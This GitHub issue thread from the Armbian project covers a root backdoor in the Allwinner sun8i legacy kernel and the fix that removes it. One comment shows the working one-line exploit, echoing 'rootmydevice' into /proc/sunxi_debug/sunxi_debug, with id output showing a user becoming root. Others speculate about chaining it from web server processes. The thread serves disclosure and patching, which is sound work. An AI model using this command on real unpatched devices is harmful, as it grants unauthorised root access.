Allwinner legacy kernel: local privileges escalation to root (sun8i) #282

Closed
ThomasKaiser opened this Issue Apr 30, 2016 · 13 comments

Projects

None yet

4 participants

@ThomasKaiser
Collaborator

Please have a look at http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390;

The file is still present in the newer sun8i BSP variant and I would assume sun7i and others are also affected?

Don't know how to deal with it.

@ThomasKaiser
Collaborator

Hmm... sun7i doesn't have it but sun8i is affected:

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)
@zador-blood-stained
Collaborator

I saw this on IRC yesterday. Even though this is more Local Privileges Escalation than a backdoor, IMO it should be disabled.

@ThomasKaiser
Collaborator

I agree that it should be disabled. Based on my understanding this privilege escalation combined with any other small bug might lead to an network enabled exploit (I would assume a php, nginx or apache process redirected to /proc/sunxi_debug/sunxi_debug could also become root this way?)

@zador-blood-stained
Collaborator

I would assume a php, nginx or apache process redirected to /proc/sunxi_debug/sunxi_debug could also become root this way?

Yes, most likely.

Removing sunxi_debug.o from this line (and deleting file sunxi_debug.c) may be the simplest solution if it doesn't break compilation.

@ThomasKaiser
Collaborator

Can you try it out? At least whether the build fails or not? My main build host is still busy doing other stuff and the 2nd host is also down (for yet unknown reasons -- too far away to look after it)

@ThomasKaiser ThomasKaiser referenced this issue in jernejsk/OpenELEC-OPi2 Apr 30, 2016
Closed

Local privileges escalation on sun8i #42

@zador-blood-stained
Collaborator

Build succeeds, so this should work

@ThomasKaiser
Collaborator

Could you also provide debs to be able to test? :-)

@ThomasKaiser ThomasKaiser changed the title from Allwinner legacy backdoor? to Allwinner legacy kernel: local privileges escalation to root (sun8i) Apr 30, 2016
@ThomasKaiser
Collaborator

Fix confirmed to work by 'original submitter' KotCzarny himself :) http://irclog.whitequark.org/linux-sunxi/2016-04-30#16321288

So please push the fix. And I hope Igor checks download log and in case no one downloaded BPi M2+ 5.10 images we could simply re-release the M2+ image with fix included (otherwise we would've to increase version number already to 5.11 if I understand correctly?)

@zador-blood-stained
Collaborator

It's in my repository already, so it's a matter of merging my branch into this.

@kotc
kotc commented Apr 30, 2016

@ThomasKaiser : happy to help, thanks for quick response!

@ThomasKaiser
Collaborator

@kotc: Thx for bringing this to our attention. Since we're rolling out a new major release this weekend this was almost perfectly timed. I also thought about fixing the issue for all of the many loboris images out there (already cloned his kernel repo since he didn't maintain it for maybe half a year) but thought again about. Users better switch to Armbian instead :)

@igorpecovnik
Owner

Bugs and problems usually arise when I do travel :) No downloads, so we can stay on 5.10 but I guess we will have an update to 5.11 in any case very soon since it's almost impossible to bring such update without any more or less serious problem.

Merged, so closing.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment